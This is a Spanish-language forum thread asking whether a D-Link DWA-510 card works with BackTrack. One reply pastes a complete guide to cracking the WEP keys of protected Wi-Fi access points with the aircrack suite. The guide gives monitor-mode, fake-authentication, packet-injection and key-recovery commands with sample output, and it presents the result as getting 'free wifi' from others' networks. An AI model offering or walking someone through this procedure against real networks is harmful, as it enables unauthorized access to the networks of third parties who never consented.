DWA-510 Compatible Backtrack

Iniciado por salchipower, 25 Agosto 2010, 17:36 PM

0 Miembros y 1 Visitante están viendo este tema.

salchipower

Hola buenas, mi duda es la siguiente. Tengo una tarjeta dwa-510 con un chipset rt61/rt2561, mi pregunta es si es compatible con backtrack, con las otras distros, me funciona en linux, y wifiway. Queria sabere si habría que instalar
los madwifi, o simplemente con los comandos modprobe rt61 y rmmod rt61 me leeria la tarjeta directamente.


Gracias, salu2
Con el puño cerrado no se puede intercambiar un apretón de manos.

P4nd3m0n1um

primero que todo entrar al setup de tu pc y activar la opcion de inicio desde un dispositivo de este tipo (ojo que no todos los pcs tienen esta caracteristica) si no, lo unico que te queda es iniciarlo desde un cd. a mi me paso eso y tuve que hacerlo asi, ademas de eso lo hice desde mi pc de escritorio, al cual le conecté una tarjeta pci D-Link dwa-510 (super económica) y segui los pasos al pie de la letra de este manual. te recomiendo si quieres hacerlo de esta manera, que ocupes esta tarjeta o al menos te averigues si en driver del chipset de la tarjeta que tienes esta soportado. en el caso de la mia el chipset es un ralink (rt61)

Black Track

Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive y nuestro pequeño Asus Eee utilizando Windows xp.

¿Empezamos?

Requisitos previos:

Necesitaremos el Backtrack 3 versión USB: Descargar desde aqui.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:

En windows vamos al menu de inicio > ejecutar > cmd

Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.

Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).

Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.

Bien, ahora empieza lo divertido…

Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.

Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.

Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).

Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.

Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.

PASO 1:

NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.

En una terminal pones:

airmon-ng start wifi0

a continuación:

airodump-ng ath1

cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes

airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1

donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.



PASO 2:

Abre una nueva terminal, ya sabes como…

aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

donde:

[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.

Si te sale esto felicidades:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

Si no, intenta con lo siguiente:

Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1

Y te debería salir algo como esto:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Si no, olvidate.

Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…



PASO 3:

aireplay-ng -3 -b [AP MAC] ath1 -x 250


Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).

Espera hata tener unos 40.000 más o menos y abre una tercera terminal.



PASO 4:

Quiero mi clave yaaaarl!!!

aircrack-ng -z -b [AP MAC] [filename*.cap]

En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.

Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.

Gracias a http://www.georgehafiz.co.uk/aircrackeeepc.php


P4nd3m0n1um

Agrego algo, te recomiendo que uses los driver de ReLink (Del Sitio WEB) ya que los del CD de D-Link pueden causar errores.